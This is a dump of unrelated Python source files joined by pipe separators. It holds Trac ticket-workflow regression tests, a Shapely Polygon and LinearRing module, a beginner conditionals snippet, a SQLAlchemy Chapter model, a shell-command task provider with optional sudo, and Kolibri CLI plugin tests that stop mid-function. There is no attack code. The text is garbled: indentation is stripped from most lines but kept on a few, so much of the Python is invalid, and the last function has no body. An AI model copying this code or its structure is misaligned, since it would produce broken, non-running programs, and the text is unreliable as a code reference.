tc.formvalue('propertyform', 'action_reassign_reassign_owner', 'admin')
tc.submit('submit')
# make ids[2] be accepted
self._tester.go_to_ticket(ids[2])
tc.formvalue('propertyform', 'action', 'accept')
tc.submit('submit')
# make ids[3] be closed
self._tester.go_to_ticket(ids[3])
tc.formvalue('propertyform', 'action', 'resolve')
tc.formvalue('propertyform', 'action_resolve_resolve_resolution', 'fixed')
tc.submit('submit')
# make ids[4] be reopened
self._tester.go_to_ticket(ids[4])
tc.formvalue('propertyform', 'action', 'resolve')
tc.formvalue('propertyform', 'action_resolve_resolve_resolution', 'fixed')
tc.submit('submit')
# FIXME: we have to wait a second to avoid "IntegrityError: columns
# ticket, time, field are not unique"
time.sleep(1)
tc.formvalue('propertyform', 'action', 'reopen')
tc.submit('submit')
tc.show()
tc.notfind("Python Traceback")
# Go to the milestone and follow the links to the closed and active
# tickets.
tc.go(self._tester.url + "/roadmap")
tc.follow(milestone)
tc.follow("closed:")
tc.find("Resolution:[ \t\n]+fixed")
tc.back()
tc.follow("active:")
tc.find("Status:[ \t\n]+new")
tc.find("Status:[ \t\n]+assigned")
tc.find("Status:[ \t\n]+accepted")
tc.notfind("Status:[ \t\n]+closed")
tc.find("Status:[ \t\n]+reopened")
class RegressionTestTicket5687(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5687"""
self._tester.logout()
self._tester.login('user')
ticketid = self._tester.create_ticket()
self._tester.logout()
self._tester.login('admin')
class RegressionTestTicket5930(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/5930
TypeError: from_string() takes exactly 3 non-keyword arguments (4
given)
Caused by a saved query
"""
self._tester.create_report('Saved Query', 'query:version=1.0', '')
tc.notfind(internal_error)
# TODO: Add a testcase for the following:
# Can you also throw in addition of a 1.0 ticket and a 2.0 ticket
# as part of the demo env, then see that only the correct one shows
# up in the report?
class RegressionTestTicket6048(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6048"""
# Setup the DeleteTicket plugin
plugin = open(os.path.join(self._testenv.command_cwd, 'sample-plugins',
'workflow', 'DeleteTicket.py')).read()
open(os.path.join(self._testenv.tracdir, 'plugins', 'DeleteTicket.py'),
'w').write(plugin)
env = self._testenv.get_trac_environment()
prevconfig = env.config.get('ticket', 'workflow')
env.config.set('ticket', 'workflow',
prevconfig + ',DeleteTicketActionController')
env.config.save()
env = self._testenv.get_trac_environment() # reload environment
# Create a ticket and delete it
ticket_id = self._tester.create_ticket(
summary='RegressionTestTicket6048')
# (Create a second ticket so that the ticket id does not get reused
# and confuse the tester object.)
self._tester.create_ticket(summary='RegressionTestTicket6048b')
self._tester.go_to_ticket(ticket_id)
tc.find('delete ticket')
tc.formvalue('propertyform', 'action', 'delete')
tc.submit('submit')
self._tester.go_to_ticket(ticket_id)
tc.find('Error: Invalid ticket number')
tc.find('Ticket %s does not exist.' % ticket_id)
# Remove the DeleteTicket plugin
env.config.set('ticket', 'workflow', prevconfig)
env.config.save()
env = self._testenv.get_trac_environment() # reload environment
for ext in ('py', 'pyc', 'pyo'):
filename = os.path.join(self._testenv.tracdir, 'plugins',
'DeleteTicket.%s' % ext)
if os.path.exists(filename):
os.unlink(filename)
class RegressionTestTicket6747(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6747"""
env = self._testenv.get_trac_environment()
env.config.set('ticket-workflow', 'resolve.operations',
'set_resolution,set_owner')
env.config.set('ticket-workflow', 'resolve.set_owner',
'a_specified_owner')
env.config.save()
try:
self._testenv.restart()
ticket_id = self._tester.create_ticket("RegressionTestTicket6747")
self._tester.go_to_ticket(ticket_id)
tc.find("a_specified_owner")
tc.notfind("a_specified_owneras")
finally:
# Undo the config change to avoid causing problems for later
# tests.
env.config.set('ticket-workflow', 'resolve.operations',
'set_resolution')
env.config.remove('ticket-workflow', 'resolve.set_owner')
env.config.save()
self._testenv.restart()
class RegressionTestTicket6879a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6879 a
Make sure that previewing a close does not make the available actions
be those for the close status.
"""
# create a ticket, then preview resolving the ticket twice
ticket_id = self._tester.create_ticket("RegressionTestTicket6879 a")
self._tester.go_to_ticket(ticket_id)
tc.formvalue('propertyform', 'action', 'resolve')
tc.formvalue('propertyform', 'action_resolve_resolve_resolution', 'fixed')
tc.submit('preview')
tc.formvalue('propertyform', 'action', 'resolve')
tc.submit('preview')
class RegressionTestTicket6879b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6879 a
Make sure that previewing a close does not make the available actions
be those for the close status.
"""
# create a ticket, then preview resolving the ticket twice
ticket_id = self._tester.create_ticket("RegressionTestTicket6879 b")
self._tester.go_to_ticket(ticket_id)
tc.formvalue('propertyform', 'action', 'resolve')
tc.formvalue('propertyform', 'action_resolve_resolve_resolution', 'fixed')
tc.submit('preview')
tc.formvalue('propertyform', 'action', 'resolve')
tc.submit('submit')
class RegressionTestTicket6912a(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6912 a"""
try:
self._tester.create_component(name='RegressionTestTicket6912a',
user='')
except twill.utils.ClientForm.ItemNotFoundError, e:
raise twill.errors.TwillAssertionError(e)
class RegressionTestTicket6912b(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/6912 b"""
self._tester.create_component(name='RegressionTestTicket6912b',
user='admin')
tc.follow('RegressionTestTicket6912b')
try:
tc.formvalue('modcomp', 'owner', '')
except twill.utils.ClientForm.ItemNotFoundError, e:
raise twill.errors.TwillAssertionError(e)
tc.formvalue('modcomp', 'save', 'Save')
tc.submit()
tc.find('RegressionTestTicket6912b</a>[ \n\t]*</td>[ \n\t]*'
'<td class="owner"></td>', 's')
class RegressionTestTicket8247(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/8247
Author field of ticket comment corresponding to the milestone removal
was always 'anonymous'."""
name = "MilestoneRemove"
self._tester.create_milestone(name)
id = self._tester.create_ticket(info={'milestone': name})
ticket_url = self._tester.url + "/ticket/%d" % id
tc.go(ticket_url)
tc.find(name)
tc.go(self._tester.url + "/admin/ticket/milestones")
tc.formvalue('milestone_table', 'sel', name)
tc.submit('remove')
tc.go(ticket_url)
tc.find('<strong>Milestone</strong>[ \n\t]*<em>%s</em> deleted' % name)
tc.find('Changed <a.*</a> ago by admin')
tc.notfind('anonymous')
class RegressionTestTicket8861(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/8816
When creating a milestone with an already existing name, you get
a warning. After changing the name you will find that the original
milestone with that name is renamed instead of a new one being
created."""
name = "8861Milestone"
self._tester.create_milestone(name)
tc.go(self._tester.url + "/milestone?action=new")
tc.formvalue('edit', 'name', name)
tc.submit('Add milestone')
tc.find('Milestone "%s" already exists' % name)
tc.formvalue('edit', 'name', name + '__')
tc.submit('Add milestone')
tc.go(self._tester.url + "/roadmap")
tc.find('Milestone: <em>%s</em>' % name)
tc.find('Milestone: <em>%s</em>' % (name + '__'))
class RegressionTestTicket9084(FunctionalTwillTestCaseSetup):
def runTest(self):
"""Test for regression of http://trac.edgewall.org/ticket/9084"""
ticketid = self._tester.create_ticket()
self._tester.add_comment(ticketid)
self._tester.go_to_ticket(ticketid)
tc.formvalue('reply-to-comment-1', 'replyto', '1')
tc.submit('Reply')
tc.formvalue('propertyform', 'comment', random_sentence(3))
tc.submit('Submit changes')
tc.notfind('AssertionError')
def functionalSuite(suite=None):
if not suite:
import trac.tests.functional.testcases
suite = trac.tests.functional.testcases.functionalSuite()
suite.addTest(TestTickets())
suite.addTest(TestTicketPreview())
suite.addTest(TestTicketNoSummary())
suite.addTest(TestTicketAltFormats())
suite.addTest(TestTicketCSVFormat())
suite.addTest(TestTicketTabFormat())
suite.addTest(TestTicketRSSFormat())
suite.addTest(TestTicketSearch())
suite.addTest(TestNonTicketSearch())
suite.addTest(TestTicketHistory())
suite.addTest(TestTicketHistoryDiff())
suite.addTest(TestTicketQueryLinks())
suite.addTest(TestTicketQueryOrClause())
suite.addTest(TestTimelineTicketDetails())
suite.addTest(TestAdminComponent())
suite.addTest(TestAdminComponentDuplicates())
suite.addTest(TestAdminComponentRemoval())
suite.addTest(TestAdminComponentNonRemoval())
suite.addTest(TestAdminComponentDefault())
suite.addTest(TestAdminComponentDetail())
suite.addTest(TestAdminMilestone())
suite.addTest(TestAdminMilestoneSpace())
suite.addTest(TestAdminMilestoneDuplicates())
suite.addTest(TestAdminMilestoneDetail())
suite.addTest(TestAdminMilestoneDue())
suite.addTest(TestAdminMilestoneDetailDue())
suite.addTest(TestAdminMilestoneCompleted())
suite.addTest(TestAdminMilestoneCompletedFuture())
suite.addTest(TestAdminMilestoneRemove())
suite.addTest(TestAdminMilestoneRemoveMulti())
suite.addTest(TestAdminMilestoneNonRemoval())
suite.addTest(TestAdminMilestoneDefault())
    suite.addTest(TestAdminPriority())
    suite.addTest(TestAdminPriorityDuplicates())
suite.addTest(TestAdminPriorityModify())
suite.addTest(TestAdminPriorityRemove())
suite.addTest(TestAdminPriorityRemoveMulti())
suite.addTest(TestAdminPriorityNonRemoval())
suite.addTest(TestAdminPriorityDefault())
suite.addTest(TestAdminPriorityDetail())
suite.addTest(TestAdminPriorityRenumber())
suite.addTest(TestAdminPriorityRenumberDup())
suite.addTest(TestAdminResolution())
suite.addTest(TestAdminResolutionDuplicates())
suite.addTest(TestAdminSeverity())
suite.addTest(TestAdminSeverityDuplicates())
suite.addTest(TestAdminType())
suite.addTest(TestAdminTypeDuplicates())
suite.addTest(TestAdminVersion())
suite.addTest(TestAdminVersionDuplicates())
suite.addTest(TestAdminVersionDetail())
suite.addTest(TestAdminVersionDetailTime())
suite.addTest(TestAdminVersionDetailCancel())
suite.addTest(TestAdminVersionRemove())
suite.addTest(TestAdminVersionRemoveMulti())
suite.addTest(TestAdminVersionNonRemoval())
suite.addTest(TestAdminVersionDefault())
suite.addTest(TestNewReport())
suite.addTest(RegressionTestRev5665())
suite.addTest(RegressionTestRev5994())
suite.addTest(RegressionTestTicket4447())
suite.addTest(RegressionTestTicket4630a())
suite.addTest(RegressionTestTicket4630b())
suite.addTest(RegressionTestTicket5022())
suite.addTest(RegressionTestTicket5394a())
suite.addTest(RegressionTestTicket5394b())
suite.addTest(RegressionTestTicket5497prep())
suite.addTest(RegressionTestTicket5497a())
suite.addTest(RegressionTestTicket5497b())
suite.addTest(RegressionTestTicket5497c())
suite.addTest(RegressionTestTicket5497d())
suite.addTest(RegressionTestTicket5602())
suite.addTest(RegressionTestTicket5687())
suite.addTest(RegressionTestTicket5930())
suite.addTest(RegressionTestTicket6048())
suite.addTest(RegressionTestTicket6747())
suite.addTest(RegressionTestTicket6879a())
suite.addTest(RegressionTestTicket6879b())
suite.addTest(RegressionTestTicket6912a())
suite.addTest(RegressionTestTicket6912b())
suite.addTest(RegressionTestTicket8247())
suite.addTest(RegressionTestTicket8861())
suite.addTest(RegressionTestTicket9084())
return suite
if __name__ == '__main__':
unittest.main(defaultTest='functionalSuite')
|
"""Polygons and their linear ring components
"""
from ctypes import c_double, c_void_p, cast, POINTER
from ctypes import ArgumentError
import weakref
from shapely.algorithms.cga import signed_area
from shapely.coords import required
from shapely.geos import lgeos
from shapely.geometry.base import BaseGeometry
from shapely.geometry.linestring import LineString, LineStringAdapter
from shapely.geometry.proxy import PolygonProxy
__all__ = ['Polygon', 'asPolygon', 'LinearRing', 'asLinearRing']
class LinearRing(LineString):
"""
A closed one-dimensional feature comprising one or more line segments
A LinearRing that crosses itself or touches itself at a single point is
invalid and operations on it may fail.
"""
def __init__(self, coordinates=None):
"""
Parameters
----------
coordinates : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
        Rings are implicitly closed. There is no need to specify a final
        coordinate pair identical to the first.
Example
-------
Construct a square ring.
        >>> ring = LinearRing(((0, 0), (0, 1), (1, 1), (1, 0)))
>>> ring.is_closed
True
>>> ring.length
4.0
"""
BaseGeometry.__init__(self)
if coordinates is not None:
self._set_coords(coordinates)
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
# Coordinate access
_get_coords = BaseGeometry._get_coords
def _set_coords(self, coordinates):
self.empty()
self._geom, self._ndim = geos_linearring_from_py(coordinates)
coords = property(_get_coords, _set_coords)
@property
def is_ccw(self):
"""True is the ring is oriented counter clock-wise"""
return bool(self.impl['is_ccw'](self))
@property
def is_simple(self):
"""True if the geometry is simple, meaning that any self-intersections
are only at boundary points, else False"""
return LineString(self).is_simple
class LinearRingAdapter(LineStringAdapter):
__p__ = None
def __init__(self, context):
self.context = context
self.factory = geos_linearring_from_py
@property
def __geo_interface__(self):
return {
'type': 'LinearRing',
'coordinates': tuple(self.coords)
}
coords = property(BaseGeometry._get_coords)
def asLinearRing(context):
"""Adapt an object to the LinearRing interface"""
return LinearRingAdapter(context)
class InteriorRingSequence(object):
_factory = None
_geom = None
__p__ = None
_ndim = None
_index = 0
_length = 0
__rings__ = None
_gtag = None
def __init__(self, parent):
self.__p__ = parent
self._geom = parent._geom
self._ndim = parent._ndim
def __iter__(self):
self._index = 0
self._length = self.__len__()
return self
def next(self):
if self._index < self._length:
ring = self._get_ring(self._index)
self._index += 1
return ring
else:
raise StopIteration
def __len__(self):
return lgeos.GEOSGetNumInteriorRings(self._geom)
def __getitem__(self, key):
m = self.__len__()
if isinstance(key, int):
if key + m < 0 or key >= m:
raise IndexError("index out of range")
if key < 0:
i = m + key
else:
i = key
return self._get_ring(i)
elif isinstance(key, slice):
res = []
start, stop, stride = key.indices(m)
for i in xrange(start, stop, stride):
res.append(self._get_ring(i))
return res
else:
raise TypeError("key must be an index or slice")
    @property
    def _longest(self):
        # Length (in coordinates) of the longest interior ring.
        longest = 0
        for g in iter(self):
            l = len(g.coords)
            if l > longest:
                longest = l
        return longest
def gtag(self):
return hash(repr(self.__p__))
def _get_ring(self, i):
gtag = self.gtag()
if gtag != self._gtag:
self.__rings__ = {}
if i not in self.__rings__:
g = lgeos.GEOSGetInteriorRingN(self._geom, i)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self.__rings__[i] = weakref.ref(ring)
return self.__rings__[i]()
class Polygon(BaseGeometry):
"""
A two-dimensional figure bounded by a linear ring
A polygon has a non-zero area. It may have one or more negative-space
"holes" which are also bounded by linear rings. If any rings cross each
other, the feature is invalid and operations on it may fail.
Attributes
----------
exterior : LinearRing
The ring which bounds the positive space of the polygon.
interiors : sequence
A sequence of rings which bound all existing holes.
"""
_exterior = None
_interiors = []
_ndim = 2
def __init__(self, shell=None, holes=None):
"""
Parameters
----------
shell : sequence
A sequence of (x, y [,z]) numeric coordinate pairs or triples
holes : sequence
A sequence of objects which satisfy the same requirements as the
shell parameters above
Example
-------
Create a square polygon with no holes
>>> coords = ((0., 0.), (0., 1.), (1., 1.), (1., 0.), (0., 0.))
>>> polygon = Polygon(coords)
>>> polygon.area
1.0
"""
BaseGeometry.__init__(self)
if shell is not None:
self._geom, self._ndim = geos_polygon_from_py(shell, holes)
@property
def exterior(self):
if self.is_empty:
return None
elif self._exterior is None or self._exterior() is None:
g = lgeos.GEOSGetExteriorRing(self._geom)
ring = LinearRing()
ring.__geom__ = g
ring.__p__ = self
ring._owned = True
ring._ndim = self._ndim
self._exterior = weakref.ref(ring)
return self._exterior()
@property
def interiors(self):
if self.is_empty:
return []
return InteriorRingSequence(self)
@property
def ctypes(self):
if not self._ctypes_data:
self._ctypes_data = self.exterior.ctypes
return self._ctypes_data
@property
def __array_interface__(self):
raise NotImplementedError(
"A polygon does not itself provide the array interface. Its rings do.")
def _get_coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
def _set_coords(self, ob):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def coords(self):
raise NotImplementedError(
"Component rings have coordinate sequences, but the polygon does not")
@property
def __geo_interface__(self):
coords = [tuple(self.exterior.coords)]
for hole in self.interiors:
coords.append(tuple(hole.coords))
return {
'type': 'Polygon',
'coordinates': tuple(coords)
}
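    # For the unit square from the constructor docstring this yields, e.g.:
    #   {'type': 'Polygon',
    #    'coordinates': (((0.0, 0.0), (0.0, 1.0), (1.0, 1.0), (1.0, 0.0),
    #                     (0.0, 0.0)),)}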
class PolygonAdapter(PolygonProxy, Polygon):
def __init__(self, shell, holes=None):
self.shell = shell
self.holes = holes
self.context = (shell, holes)
self.factory = geos_polygon_from_py
@property
def _ndim(self):
try:
# From array protocol
array = self.shell.__array_interface__
n = array['shape'][1]
assert n == 2 or n == 3
return n
except AttributeError:
# Fall back on list
return len(self.shell[0])
def asPolygon(shell, holes=None):
"""Adapt objects to the Polygon interface"""
return PolygonAdapter(shell, holes)
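# Illustrative adaptation (a sketch; coordinates arbitrary):
#   square = asPolygon([(0.0, 0.0), (0.0, 1.0), (1.0, 1.0), (1.0, 0.0)])
# The adapter is intended to wrap the caller's sequence rather than copy it,
# so geometry operations read coordinates through the original object.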
def orient(polygon, sign=1.0):
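    """Return a new Polygon with rings oriented according to ``sign``.
    With the default ``sign=1.0`` the exterior ring winds counter-clockwise
    and any holes wind clockwise; ``sign=-1.0`` reverses both conventions.
    A ring is reversed whenever ``signed_area(ring) / sign`` has the wrong
    sign for its role.
    """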
s = float(sign)
rings = []
ring = polygon.exterior
if signed_area(ring)/s >= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
for ring in polygon.interiors:
if signed_area(ring)/s <= 0.0:
rings.append(ring)
else:
rings.append(list(ring.coords)[::-1])
return Polygon(rings[0], rings[1:])
def geos_linearring_from_py(ob, update_geom=None, update_ndim=0):
    # If numpy is present, we use numpy.require to ensure that we have a
    # C-contiguous array that owns its data. View data will be copied.
ob = required(ob)
try:
# From array protocol
array = ob.__array_interface__
assert len(array['shape']) == 2
m = array['shape'][0]
n = array['shape'][1]
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert n == 2 or n == 3
# Make pointer to the coordinate array
if isinstance(array['data'], tuple):
# numpy tuple (addr, read-only)
cp = cast(array['data'][0], POINTER(c_double))
else:
cp = array['data']
        # If the first and last coordinates differ, reserve one extra slot so
        # the ring can be closed explicitly below.
if cp[0] != cp[m*n-n] or cp[1] != cp[m*n-n+1]:
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in xrange(m):
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, cp[n*i])
lgeos.GEOSCoordSeq_setY(cs, i, cp[n*i+1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, i, cp[n*i+2])
# Add closing coordinates to sequence?
if M > m:
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M-1, cp[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, cp[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, cp[2])
except AttributeError:
# Fall back on list
m = len(ob)
n = len(ob[0])
if m < 3:
raise ValueError(
"A LinearRing must have at least 3 coordinate tuples")
assert (n == 2 or n == 3)
# Add closing coordinates if not provided
if m == 3 or ob[0][0] != ob[-1][0] or ob[0][1] != ob[-1][1]:
M = m + 1
else:
M = m
# Create a coordinate sequence
if update_geom is not None:
cs = lgeos.GEOSGeom_getCoordSeq(update_geom)
if n != update_ndim:
raise ValueError(
"Wrong coordinate dimensions; this geometry has dimensions: %d" \
% update_ndim)
else:
cs = lgeos.GEOSCoordSeq_create(M, n)
# add to coordinate sequence
for i in xrange(m):
coords = ob[i]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, i, coords[0])
lgeos.GEOSCoordSeq_setY(cs, i, coords[1])
if n == 3:
try:
lgeos.GEOSCoordSeq_setZ(cs, i, coords[2])
except IndexError:
raise ValueError("Inconsistent coordinate dimensionality")
# Add closing coordinates to sequence?
if M > m:
coords = ob[0]
# Because of a bug in the GEOS C API,
# always set X before Y
lgeos.GEOSCoordSeq_setX(cs, M-1, coords[0])
lgeos.GEOSCoordSeq_setY(cs, M-1, coords[1])
if n == 3:
lgeos.GEOSCoordSeq_setZ(cs, M-1, coords[2])
if update_geom is not None:
return None
else:
return lgeos.GEOSGeom_createLinearRing(cs), n
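# Illustrative closing behavior (a sketch): a three-point input such as
#   [(0.0, 0.0), (1.0, 0.0), (1.0, 1.0)]
# produces a four-point GEOS ring, because the first coordinate is appended
# again to close the ring explicitly.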
def update_linearring_from_py(geom, ob):
geos_linearring_from_py(ob, geom._geom, geom._ndim)
def geos_polygon_from_py(shell, holes=None):
if shell is not None:
geos_shell, ndim = geos_linearring_from_py(shell)
if holes:
ob = holes
L = len(ob)
exemplar = ob[0]
try:
N = len(exemplar[0])
except TypeError:
N = exemplar._ndim
assert L >= 1
assert N == 2 or N == 3
# Array of pointers to ring geometries
geos_holes = (c_void_p * L)()
# add to coordinate sequence
for l in xrange(L):
geom, ndim = geos_linearring_from_py(ob[l])
geos_holes[l] = cast(geom, c_void_p)
else:
geos_holes = POINTER(c_void_p)()
L = 0
return (
lgeos.GEOSGeom_createPolygon(
c_void_p(geos_shell),
geos_holes,
L
),
ndim
)
# Test runner
def _test():
import doctest
doctest.testmod()
if __name__ == "__main__":
_test()
|
x = 2
print(x == 2)  # True
print(x == 3)  # False
print(x < 3)   # True
# Boolean operators
name = "John"
age = 23
if name == "John" and age == 23:
print("Your name is John, and you are also 23 years old.")
if name == "John" or name == "Rick":
print("Your name is either John or Rick.")
# in operator
# The "in" operator checks whether an object exists within an iterable
# container, such as a list:
mylist = ["John", "Rick"]
if name in mylist:
print("You are here with us")
# if / elif / else statement block in python
x = 3
if x == 2:
    print("x is 2")
elif x == 3:
    print("x is 3")
else:
    print("value does not match")
|
from . import Base
from sqlalchemy import Column, Integer, Text, DateTime, ForeignKey
from datetime import datetime
class Chapter(Base):
__tablename__ = "chapters"
id = Column(Integer, primary_key=True, autoincrement=True)
manga_id = Column(Integer, ForeignKey("manga.id"))
chapter_no = Column(Integer)
chapter_postfix = Column(Text)
ordinal = Column(Integer)
page_count = Column(Integer)
title = Column(Text)
version = Column(Integer)
language_id = Column(Text)
group_id = Column(Integer)
date_added = Column(DateTime)
ipfs_link = Column(Text)
def to_dict(self):
return {
"id" : self.id,
"manga_id" : self.manga_id,
"chapter_no" : self.chapter_no,
"chapter_postfix" : self.chapter_postfix,
"ordinal" : self.ordinal,
"title" : self.title,
"page_count" : self.page_count,
"version" : self.version,
"language_id" : self.language_id,
"group_id" : self.group_id,
"date_added" : int(self.date_added.timestamp()),
"ipfs_link" : self.ipfs_link
}
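# Illustrative use (a sketch; ``engine`` and the row id are hypothetical):
#   from sqlalchemy.orm import Session
#   with Session(engine) as session:
#       chapter = session.get(Chapter, 1)
#       payload = chapter.to_dict()  # date_added becomes a Unix timestamp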
|
from systems.plugins.index import BaseProvider
import re
import shlex
class Provider(BaseProvider('task', 'command')):
def execute(self, results, params):
env = self._env_vars(params)
stdin = params.pop('input', self.field_input)
cwd = params.pop('cwd', self.field_cwd)
display = params.pop('display', self.field_display)
options = self._merge_options(self.field_options, params, self.field_lock)
command = self._interpolate(self.field_command, options)
if self.field_sudo:
command = 'sudo ' + command[0]
else:
command = command[0]
self.command.sh(shlex.split(command),
input = stdin,
display = display,
env = env,
cwd = cwd
)
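# Illustrative flow (a sketch; the field values are hypothetical): with
#   field_command = 'ls -la {directory}' and options = {'directory': '/tmp'},
# _interpolate() appears to return a list whose first element is the rendered
# command string; after the optional sudo prefix, shlex.split() turns it into
# the argv list handed to self.command.sh().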
|
"""
Tests for `kolibri.utils.cli` module.
"""
from __future__ import absolute_import
from __future__ import print_function
import logging
import os
import tempfile
import pytest
from django.db.utils import OperationalError
from mock import patch
import kolibri
from kolibri.plugins.utils import autoremove_unavailable_plugins
from kolibri.utils import cli
from kolibri.utils import options
logger = logging.getLogger(__name__)
LOG_LOGGER = []
def log_logger(logger_instance, LEVEL, msg, args, **kwargs):
"""
Monkeypatching for logging.Logger._log to scoop up log messages if we wanna
test something specific was logged.
"""
LOG_LOGGER.append((LEVEL, msg))
# Call the original function
logger_instance.__log(LEVEL, msg, args, **kwargs)
def activate_log_logger(monkeypatch):
"""
Activates logging everything to ``LOG_LOGGER`` with the monkeypatch pattern
of py.test (test accepts a ``monkeypatch`` argument)
"""
monkeypatch.setattr(logging.Logger, "__log", logging.Logger._log, raising=False)
monkeypatch.setattr(logging.Logger, "_log", log_logger)
@pytest.fixture
def plugins():
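    """Swap in a throw-away plugin config file for the duration of a test."""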
from kolibri import plugins
_, config_file = tempfile.mkstemp(suffix="json")
old_config_file = plugins.conf_file
plugins.conf_file = config_file
plugins.config.set_defaults()
yield plugins
plugins.conf_file = old_config_file
def test_bogus_plugin_autoremove(plugins):
"""
Checks that a plugin is auto-removed when it cannot be imported
"""
plugin_name = "giraffe.horse"
plugins.config["INSTALLED_PLUGINS"].add(plugin_name)
plugins.config.save()
autoremove_unavailable_plugins()
assert plugin_name not in plugins.config["INSTALLED_PLUGINS"]
def test_bogus_plugin_autoremove_no_path(plugins):
"""
Checks that a plugin without a dotted path is also auto-removed
"""
plugin_name = "giraffehorse"
plugins.config["INSTALLED_PLUGINS"].add(plugin_name)
plugins.config.save()
autoremove_unavailable_plugins()
assert plugin_name not in plugins.config["INSTALLED_PLUGINS"]
def test_bogus_plugin_disable(plugins):
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
disabled_apps_before = plugins.config["DISABLED_PLUGINS"].copy()
try:
cli.disable.callback(("i_do_not_exist",), False)
except Exception:
pass
assert installed_apps_before == plugins.config["INSTALLED_PLUGINS"]
assert disabled_apps_before == plugins.config["DISABLED_PLUGINS"]
def test_plugin_cannot_be_imported_disable(plugins):
"""
A plugin may be in plugins.config['INSTALLED_PLUGINS'] but broken or uninstalled
"""
plugin_name = "giraffe.horse"
plugins.config["INSTALLED_PLUGINS"].add(plugin_name)
plugins.config.save()
try:
cli.disable.callback((plugin_name,), False)
except Exception:
pass
assert plugin_name not in plugins.config["INSTALLED_PLUGINS"]
# We also don't want to endlessly add cruft to the disabled apps
assert plugin_name not in plugins.config["DISABLED_PLUGINS"]
def test_real_plugin_disable(plugins):
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
test_plugin = "kolibri.plugins.media_player"
assert test_plugin in installed_apps_before
    # The example plugin is gone, so use media_player as the test plugin.
cli.disable.callback((test_plugin,), False)
assert test_plugin not in plugins.config["INSTALLED_PLUGINS"]
assert test_plugin in plugins.config["DISABLED_PLUGINS"]
def test_real_plugin_disable_twice(plugins):
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
test_plugin = "kolibri.plugins.media_player"
assert test_plugin in installed_apps_before
cli.disable.callback((test_plugin,), False)
assert test_plugin not in plugins.config.ACTIVE_PLUGINS
assert test_plugin not in plugins.config["INSTALLED_PLUGINS"]
assert test_plugin in plugins.config["DISABLED_PLUGINS"]
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
cli.disable.callback((test_plugin,), False)
assert test_plugin not in plugins.config.ACTIVE_PLUGINS
assert test_plugin not in plugins.config["INSTALLED_PLUGINS"]
assert test_plugin in plugins.config["DISABLED_PLUGINS"]
def test_plugin_with_no_plugin_class(plugins):
"""
Expected behavior is that nothing blows up with exceptions, user just gets
a warning and nothing is enabled or changed in the configuration.
"""
# For fun, we pass in a system library
installed_apps_before = plugins.config["INSTALLED_PLUGINS"].copy()
try:
cli.enable.callback(("os.path",), False)
except Exception:
pass
assert installed_apps_before == plugins.config["INSTALLED_PLUGINS"]
@pytest.mark.django_db
def test_kolibri_listen_port_env(monkeypatch):
"""
Starts and stops the server, mocking the actual server.start()
Checks that the correct fallback port is used from the environment.
"""
with patch("django.core.management.call_command"), patch(
"kolibri.utils.server.start"
) as start:
from kolibri.utils import server
def start_mock(port, *args, **kwargs):
assert port == test_port
try:
os.remove(server.STARTUP_LOCK)
except OSError:
pass
activate_log_logger(monkeypatch)
start.side_effect = start_mock
test_port = 1234
os.environ["KOLIBRI_HTTP_PORT"] = str(test_port)
# force a reload of plugins.OPTIONS so the environment variable will be read in
from kolibri.utils import conf
conf.OPTIONS.update(options.read_options_file(conf.KOLIBRI_HOME))
cli.start.callback(test_port, False)
with pytest.raises(SystemExit) as excinfo:
cli.stop.callback()
        assert excinfo.value.code == 0
# Stop the server AGAIN, asserting that we can call the stop command
# on an already stopped server and will be gracefully informed about
# it.
with pytest.raises(SystemExit) as excinfo:
cli.stop.callback()
        assert excinfo.value.code == 0
assert "Already stopped" in LOG_LOGGER[-1][1]
def status_starting_up():
raise server.NotRunning(server.STATUS_STARTING_UP)
# Ensure that if a server is reported to be 'starting up', it doesn't
# get killed while doing that.
monkeypatch.setattr(server, "get_status", status_starting_up)
with pytest.raises(SystemExit) as excinfo:
cli.stop.callback()
        assert excinfo.value.code == server.STATUS_STARTING_UP
assert "Not stopped" in LOG_LOGGER[-1][1]
@pytest.mark.django_db
@patch("kolibri.utils.cli.get_version", return_value="")
@patch("kolibri.utils.cli.update")
@patch("kolibri.utils.cli.plugin.callback")
@patch("kolibri.core.deviceadmin.utils.dbbackup")
def test_first_run(dbbackup, plugin, update, get_version):
